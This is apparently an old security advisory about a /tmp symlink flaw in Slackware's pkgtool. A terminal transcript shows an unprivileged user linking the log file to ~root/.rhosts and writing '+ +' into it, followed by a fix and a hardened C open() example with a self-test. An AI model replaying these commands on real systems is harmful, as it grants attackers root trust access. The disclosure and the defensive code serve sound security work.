Linux Slackware 3.0 or earlier


    PKGTOOL changes the permissions of /tmp/PKGTOOL.REMOVED so it can append
    to it, but the permissions are set READ/WRITE for User, Group and Other.
    If the file does not exist, an attacker can create a symlink to any file
    (e.g. /root/.rhosts) and then write to it through that name.

    If /tmp/PKGTOOL.REMOVED gets deleted  or hasn't been created  yet,
    any user can now create a symbolic link from  /tmp/PKGTOOL.REMOVED
    to ~root/.rhosts (for a generic  example).  The next time  PKGTOOL
    is run, which will more than likely be run by root,  ~root/.rhosts
    will be created as  a 666 file with  the logs from PKGTOOL  as its
    contents.  One may now simply do an

    echo "+ +" > /tmp/PKGTOOL.REMOVED, then rm /tmp/PKGTOOL.REMOVED

    For this example, root is the victim while hamors is the attacker:

    hamors (2 20:57) litterbox:/tmp> ls -al | grep PKG
    -rw-rw-rw-   1 root     root        16584 Aug 26 18:07 PKGTOOL.REMOVED.backup

    hamors (3 21:00) litterbox:/tmp> ln -s ~root/.rhosts PKGTOOL.REMOVED

    hamors (4 20:58) litterbox:/tmp> cat PKGTOOL.REMOVED
    cat: PKGTOOL.REMOVED: No such file or directory

    God (17 20:59) litterbox:~# pkgtool
      root now uses PKGTOOL to delete a package

    hamors (5 DING!) litterbox:/tmp> head PKGTOOL.REMOVED
    Removing package tcl:
    Removing files:

    hamors (6 21:00) litterbox:/tmp> echo "+ +" > PKGTOOL.REMOVED

    hamors (7 21:00) litterbox:/tmp> cat ~root/.rhosts
    + +


    chmod 700 pkgtool, so only root can run it; from now on install software only as root.
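    The chmod above limits who can run pkgtool; the underlying defect is how the
    log file is created in /tmp (a symlink under the expected name is followed and
    the result is mode 666). The following is an added example, not pkgtool's own
    code: a hardened open() for such a log file, checked against a constructed
    symlink scenario in a private scratch directory.

```c
/* Added example, not pkgtool's own code: creating a log file in a shared
 * directory such as /tmp without following a symlink planted under the
 * expected name, and without leaving the log world-writable. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* The advisory's behaviour amounts to open(path, O_WRONLY|O_CREAT, 0666),
 * which follows a symlink and creates whatever it points at as a 666 file.
 * O_EXCL refuses any pre-existing path, symlink included (EEXIST);
 * O_NOFOLLOW refuses a symlink at the last component (ELOOP), which also
 * protects later appends; mode 0600 keeps other users out of the log. */
int open_log_safely(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Constructed scenario in a private scratch directory.  Returns a bitmask:
 * 1 = a planted PKGTOOL.REMOVED symlink to an empty stand-in for
 *     ~root/.rhosts was refused and the target stayed empty;
 * 2 = with the link gone, a fresh regular file was created that group and
 *     others can neither read nor write. */
int demo_safe_open(void) {
    char dir[] = "/tmp/pkgtool-demo-XXXXXX", victim[300], lnk[300];
    int result = 0, fd;
    struct stat st;
    if (!mkdtemp(dir)) return 0;
    snprintf(victim, sizeof victim, "%s/rhosts", dir);
    snprintf(lnk, sizeof lnk, "%s/PKGTOOL.REMOVED", dir);
    fd = open(victim, O_WRONLY | O_CREAT, 0600);  /* stand-in for ~root/.rhosts */
    if (fd >= 0 && close(fd) == 0 && symlink(victim, lnk) == 0) {
        fd = open_log_safely(lnk);
        if (fd < 0 && (errno == EEXIST || errno == ELOOP) &&
            stat(victim, &st) == 0 && st.st_size == 0)
            result |= 1;
        if (fd >= 0) close(fd);
    }
    unlink(lnk);                      /* attacker's link removed: normal case */
    fd = open_log_safely(lnk);
    if (fd >= 0) {
        if (fstat(fd, &st) == 0 && S_ISREG(st.st_mode) && (st.st_mode & 077) == 0)
            result |= 2;
        close(fd);
    }
    unlink(lnk); unlink(victim); rmdir(dir);
    return result;
}
```

    On a Linux system with a writable /tmp, demo_safe_open() returns 3 (both checks pass).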